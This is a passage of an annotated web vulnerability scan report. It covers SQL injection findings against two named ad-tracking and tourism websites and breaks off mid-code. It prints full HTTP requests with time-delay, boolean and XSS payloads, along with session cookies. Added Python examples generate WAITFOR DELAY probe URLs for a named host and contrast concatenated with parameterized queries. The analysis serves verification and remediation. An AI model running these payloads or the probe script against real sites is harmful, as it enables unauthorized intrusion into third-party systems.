The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the syndicationOutletId parameter. The application took 20025 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

Same mechanism as 1.43: the value is concatenated into the procedure call, the delay runs, and the -- cuts off what follows. Here the procedure reports @adRotationId rather than @campaignId as missing, so a different part of the command string was removed. The 20025 ms response time matches the 20 s payload.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146waitfor%20delay'0%3a0%3a20'--&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:56:09 GMT
Expires: Fri, 18 Mar 2011 15:55:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQQCAQSD=BNIGIJDBBNDKLACAHBLKPMEP; path=/
X-Powered-By: ASP.NET
Content-Length: 776
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860,
...[SNIP]...
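The time-based findings above (1.43 and 1.44 here, and 1.50, 1.53 and 1.54 below) each rest on one request that took about 20 seconds longer than the original. The check a tester wants before citing such a finding is to inject several different delays and require the extra response time to track the injected value. The following is an added example, not code from the XSS.CX report or from the scanned application; the function names (probe_url, plan, measure, analyze) and the timing samples in SAMPLES are this example's own, the samples being constructed to mirror the numbers in the report.

```python
"""Time-based confirmation of the WAITFOR DELAY findings.

Added example; this is not code from the XSS.CX report or from the scanned
application.  Findings 1.43, 1.44, 1.50, 1.53 and 1.54 each rest on a single
request that took about 20 s longer than the original.  One sample can be a
coincidence (a stalled backend, a slow proxy), so the check a tester wants is
to inject several different delays and require the extra response time to
track the injected value.  probe_url, plan, measure, analyze and SAMPLES are
this example's own names; the SAMPLES timings are constructed to mirror the
numbers in the report.
"""
import statistics
import time
from urllib.error import HTTPError
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit
from urllib.request import urlopen


def waitfor_payload(seconds: int) -> str:
    """T-SQL suffix payload in the shape the report used: waitfor delay'0:0:20'--"""
    return f"waitfor delay'0:0:{int(seconds)}'--"


def probe_url(base_url: str, param: str, seconds: int) -> str:
    """Append a WAITFOR DELAY payload to `param`, leaving the other query
    parameters intact.  Values are percent-encoded (space -> %20, ' -> %27,
    : -> %3A), which is what the scanner's requests show as well."""
    parts = urlsplit(base_url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if param not in dict(pairs):
        raise KeyError(f"{param!r} is not in the query string")
    pairs = [(k, v + waitfor_payload(seconds) if k == param else v) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(pairs, quote_via=quote)))


def plan(base_url: str, param: str, delays=(5, 10, 20)):
    """Probe list: the unmodified URL (delay 0) plus one URL per delay value.
    Request every entry more than once to average out jitter."""
    return [(0, base_url)] + [(d, probe_url(base_url, param, d)) for d in delays]


def measure(url: str, timeout: float = 90.0) -> float:
    """Wall-clock milliseconds for one GET.  A 500 (as in 1.54) or a redirect
    still yields a usable timing."""
    start = time.perf_counter()
    try:
        urlopen(url, timeout=timeout).read()
    except HTTPError:
        pass
    return (time.perf_counter() - start) * 1000.0


def analyze(samples, tolerance: float = 0.2) -> dict:
    """samples: iterable of (injected_delay_seconds, elapsed_ms); delay 0 marks
    a baseline measurement.

    Confirmed when, for every non-zero delay, the time above the baseline is
    an integer multiple k >= 1 of the injected delay (within `tolerance`) and
    k is the same for all delays.  k == 2 is what 1.53 and 1.54 show (about
    40 s for a 20 s payload): the statement ran twice per request.
    """
    base = [ms for d, ms in samples if d == 0]
    probes = [(d, ms) for d, ms in samples if d > 0]
    if not base or not probes:
        raise ValueError("need at least one baseline (delay 0) and one probe")
    baseline = statistics.median(base)
    multiples = set()
    for d, ms in probes:
        ratio = (ms - baseline) / (d * 1000.0)
        k = round(ratio)
        if k < 1 or abs(ratio - k) > tolerance:
            return {"confirmed": False, "multiple": None, "baseline_ms": baseline}
        multiples.add(k)
    confirmed = len(multiples) == 1
    return {"confirmed": confirmed,
            "multiple": multiples.pop() if confirmed else None,
            "baseline_ms": baseline}


# Constructed timing samples, in the shape measure() returns (milliseconds).
SAMPLES = {
    # 1.43 shape: ~0 ms baseline, 20131 ms for the 20 s payload, and shorter
    # delays that scale the same way
    "siteId": [(0, 0), (0, 3), (5, 5060), (10, 10090), (20, 20131)],
    # 1.53 shape: ~1.9 s baseline, 41933 ms for 20 s, i.e. the delay ran twice
    "U": [(0, 1888), (0, 1903), (5, 11900), (10, 21950), (20, 41933)],
    # a backend that is merely slow: the extra time does not track the delay
    "slow": [(0, 4000), (5, 9100), (10, 9300), (20, 9400)],
}

if __name__ == "__main__":
    base = ("http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/"
            "?siteId=1860&syndicationOutletId=47146&campaignId=6330")
    for delay, url in plan(base, "siteId"):
        print(delay, url)          # the URLs to request, in order
    for name, samples in SAMPLES.items():
        print(name, analyze(samples))
```

Run the plan against a host you are testing by feeding each URL to measure() two or three times and passing the (delay, ms) pairs to analyze(); a "confirmed" result with multiple 1 is the 1.43 pattern, multiple 2 the 1.53/1.54 pattern, and anything else means the timing is not following the payload.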

1.45. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat: as in 1.41, the request already carries 1;WAITFOR DELAY '0:0:25'-- in siteId, and the error returned is the same "@campaignId was not supplied" message that payload produces alone. This instance does not show the ' in syndicationOutletId doing anything; the time-delay test in 1.44 is the evidence for this parameter.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146'&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:21:20 GMT
Expires: Fri, 25 Mar 2011 16:20:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQRSRQTQ=IAJNMDBCLDODEBLPPGIGIJKK; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.46. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [vpp cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The vpp cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the vpp cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat: the error in the response is produced by the 1;WAITFOR DELAY '0:0:25'-- payload that the query string still carries in siteId (compare 1.41 and 1.45, same request, same 793-byte body), not by the ' appended to the cookie. Nothing on this page shows the vpp cookie reaching a query; retest it with a clean query string.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39'; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:29:17 GMT
Expires: Fri, 25 Mar 2011 16:28:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQRSRABC=DDJJGOPBFPILNKKNIONPBCAI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.47. http://www.b2f-concept.com/KERNEL/ [ASPSESSIONIDCSABRTBS cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The ASPSESSIONIDCSABRTBS cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the ASPSESSIONIDCSABRTBS cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The response body, obtained after a redirect, contains Ligne 1 : syntaxe incorrecte vers '3' (SQL Server: "Line 1: Incorrect syntax near '3'"). That is a parse error, so the statement that received the value never executed and the waitfor delay in the payload did not run; only the error text, not timing, is evidence here. ASPSESSIONIDCSABRTBS is the session identifier issued by IIS itself, an unusual value for an application to put in a query, so confirm by sending ' and then '' alone in this cookie with every other header unchanged and checking that the error follows the cookie rather than the request (compare 1.54, where the VISITEUR cookie is confirmed by a time delay).

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/ HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA')waitfor%20delay'0%3a0%3a20'--; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6596
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:20:54 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...
<div id="MTOP">pageUniverselle.asp: [Microsoft][ODBC SQL Server Driver][SQL Server]Ligne 1 : syntaxe incorrecte vers '3'.</div>
...[SNIP]...

1.48. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payloads 16491580'%20or%201%3d1--%20 and 16491580'%20or%201%3d2--%20 were each submitted in the NODE_ID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Here the responses are the reverse of the naive expectation: the or 1=1 request received the 206-byte error page Cette page n'existe plus ("This page no longer exists"), while or 1=2 received the full 6608-byte home page. A difference is still a difference, and a condition that matches every row can push an application that expects exactly one row into its error path, but this instance alone is weak evidence; the parse error in 1.49 and the time delay in 1.50 on the same parameter are the findings that count.

Request 1

GET /KERNEL/?NODE_ID={2124CD9C-901D-4D4E-A690-79703CC24099}16491580'%20or%201%3d1--%20&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03} HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 206
Content-Type: text/html
Expires: Sat, 19 Mar 2011 01:59:16 GMT
Cache-control: private


<html>
<head>
<title>Groupe B2F Concept - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur </h2>
Cette page n'existe plus
</body>
</html>

Request 2

GET /KERNEL/?NODE_ID={2124CD9C-901D-4D4E-A690-79703CC24099}16491580'%20or%201%3d2--%20&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03} HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6608
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:20:21 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation et h&#233;bergement de sites Internet, Intranet, Extranet, SMS, centrales de r&#233;servation, e-tourisme, e-business. Centrales de r&#233;servation, place de march&#233;, ">
<meta name="Keywords" content="B2f, icor, Soprane, france, savoie, rhone-alpes, chambery, technolac, tourisme, infographie, reseau, web, internet, multimedia, logiciel, formation, intranet, informatique, reservation, hebergement, messagerie, adsl, modem, service, ssii, e-business, e-tourisme, securite, communication, abonnement, centrale, centre, serveur, numeris, rh&#244;ne-alpes, chamb&#233;ry, num&#233;ris, r&#233;seau, multim&#233;dia, r&#233;servation, h&#233;bergement, s&#233;curit&#233;, rh&#244;nes-alpes, chamb&#233;ry, r&#233;seau, multim&#233;dia, r&#233;servation, h&#233;bergement, num&#233;ris, s&#233;curit&#233;,">
<title>Groupe B2F Concept - Accueil</title>
<base href="http://www.b2f-concept.com/KERNEL/">

<link rel="stylesheet" href="default.css" type="text/css">
<!-- B2F group styles -->
<link rel="stylesheet" href="CSS.asp?id={93A6C784-63F3-4C68-B15D-CBC958ACF036}&DB=CLT3" type="text/css">
<!-- referencement -->
<link rel="stylesheet" href="CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}&DB=CLT3" type="text/css">

<style type="text/css">
#BODY    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px;}
#TOP    {}
#MTOP    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#BOTTOM    {}
#MBOTTOM    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#RIGHT    {}
#MRIGHT    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#HEADER    {}
#MHEADER    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:13px}
#FOOTER    {}
#MFOOTER    {margin-left:6px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#COLB    {;background-image:URL(DOC.
...[SNIP]...
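The inverted outcome in 1.48 (the "true" probe producing the error page, the "false" probe the home page) is easy to reproduce once the lookup's row handling is taken into account. The following is an added example, not code from the XSS.CX report or from www.b2f-concept.com: a toy copy of the NODE_ID lookup backed by an in-memory SQLite table with constructed rows. It assumes, as a hypothesis rather than something the report states, that the page expects one row, falls back to the home node on none and errors on several; the node table, the vulnerable and parameterized lookups, render() and boolean_check() are this example's own.

```python
"""Boolean (difference-based) injection, reproduced on a toy copy of the
NODE_ID lookup.

Added example; not code from the XSS.CX report or from www.b2f-concept.com.
Finding 1.48 shows the naive expectation inverted: the "or 1=1" probe got the
"Cette page n'existe plus" error page and the "or 1=2" probe got the normal
home page.  One ordinary way to get exactly that: the page expects its lookup
to return one row, falls back to the home node when it returns none, and
errors when it returns several.  That is a hypothesis about the real
application, not something the report states; the toy below is built that
way to show the effect.  The node table, the two lookup functions, render()
and boolean_check() are this example's own.
"""
import sqlite3

VALID = "2124CD9C-901D-4D4E-A690-79703CC24099"   # NODE_ID used in the report
HOME = "59521607-FF21-43C6-8C1B-18C29BB87C78"    # assumed here to be the home node
TRUE_PROBE = "16491580' or 1=1-- "               # the two payloads from 1.48, decoded
FALSE_PROBE = "16491580' or 1=2-- "


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS node table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nodes (id TEXT PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO nodes VALUES (?, ?)", [
        (HOME, "Accueil"),
        (VALID, "Une info"),
        ("93A6C784-63F3-4C68-B15D-CBC958ACF036", "Styles"),
    ])
    return db


def lookup_vulnerable(db, node_id: str):
    # The value is spliced into the statement text, the pattern behind the
    # syntax errors in 1.47 and 1.49.  "' or 1=1-- " widens the WHERE clause
    # to every row; "' or 1=2-- " narrows it to none.
    return db.execute(
        f"SELECT id, title FROM nodes WHERE id = '{node_id}'").fetchall()


def lookup_parameterized(db, node_id: str):
    # The value travels as a bound parameter; whatever it contains, it is
    # compared as data and cannot change the statement.
    return db.execute(
        "SELECT id, title FROM nodes WHERE id = ?", (node_id,)).fetchall()


def render(db, node_id: str, lookup) -> str:
    """One row -> that page; none -> home; several -> the error page.
    (The hypothesised row-count behaviour described above.)"""
    rows = lookup(db, node_id)
    if len(rows) == 1:
        return f"Groupe B2F Concept - {rows[0][1]}"
    if not rows:
        return "Groupe B2F Concept - Accueil"
    return "Erreur: Cette page n'existe plus"


def boolean_check(db, lookup, valid_id: str) -> dict:
    """The scanner's test (do the two probes differ?) plus the baseline, so
    the reader can see which probe matched the normal page and which did not."""
    base = render(db, valid_id, lookup)
    t = render(db, valid_id + TRUE_PROBE, lookup)
    f = render(db, valid_id + FALSE_PROBE, lookup)
    return {"baseline": base, "true": t, "false": f, "injectable": t != f}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   ", boolean_check(db, lookup_vulnerable, VALID))
    print("parameterized", boolean_check(db, lookup_parameterized, VALID))
```

With the concatenating lookup the "true" probe matches all three rows and lands on the error page while the "false" probe matches none and lands on the home page, exactly the shape seen in 1.48; with the bound parameter both probes are just unknown identifiers and render the same home page, so the difference test reports nothing.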

1.49. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the NODE_ID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The message, Ligne 1 : syntaxe incorrecte vers '1' (SQL Server: "Line 1: Incorrect syntax near '1'"), shows the value reaching the query parser; the statement itself failed, so nothing executed here. 1.50 confirms execution on the same parameter with a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099'%20and%201%3d1--%20&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:53:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6129
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:13:48 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...
<div id="MTOP">pageUniverselle.asp: [Microsoft][ODBC SQL Server Driver][SQL Server]Ligne 1 : syntaxe incorrecte vers '1'.</div>
...[SNIP]...

1.50. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the NODE_ID parameter. The application took 21232 milliseconds to respond to the request, compared with 1903 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The 21232 ms response against a 1903 ms baseline is the 20 s payload plus the page's normal processing time. The response body is empty (Content-Length: 0): the trailing -- removed whatever followed the value and the page rendered nothing, yet the delay still went through. This is the finding to cite for NODE_ID; it holds even where error messages are suppressed.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78'waitfor%20delay'0%3a0%3a20'--&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:55:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:15:43 GMT
Cache-control: private


1.51. http://www.b2f-concept.com/KERNEL/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Caveat: the error returned, [Microsoft][ODBC SQL Server Driver] Impossible de générer le contexte SSPI ("Cannot generate SSPI context"), is raised by the ODBC driver while authenticating the connection to SQL Server, before any statement is sent, and carries no information about how the Referer value is used. The same 248-byte error page came back for the __utmb (1.55) and __utmc (1.56) probes sent within the same minute on 25 Mar 2011, while the requests of 18 Mar received normal pages, so the likely explanation is that the database was unreachable during that pass of the scan. The scanner's suggestion that a URL-encoded NULL byte (%00) circumvents input filtering is a generic heuristic attached to this payload and is not supported by anything in the response. Retest the header with a plain ' once the backend is healthy before counting it.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:08:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:07:28 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A08%3A28; expires=Sat, 25-Jun-2011 16:08:28 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=GFAGAOMBNIHABMJDKKEAFNKJ; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...
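The error-based findings in this report are of three different kinds and deserve different weight: a SQL Server parse error (1.47, 1.49), a stored-procedure call truncated by the payload's trailing -- (1.41 to 1.46), and the SSPI connection failure just discussed (1.51, 1.55, 1.56), which is not a statement error at all. A second question is attribution: in 1.41, 1.45 and 1.46 the baseline request already produced the same error. The following triage helper is an added example, not code from the XSS.CX report or from either scanned application; Evidence, classify, details, attributable and SAMPLE are this example's own names, and the SAMPLE bodies are cut down from the response snippets shown on this page.

```python
"""Triage of error-message evidence across findings 1.41 to 1.56.

Added example; not code from the XSS.CX report or from either scanned
application.  Three kinds of response text appear in these findings and they
are not equally strong:

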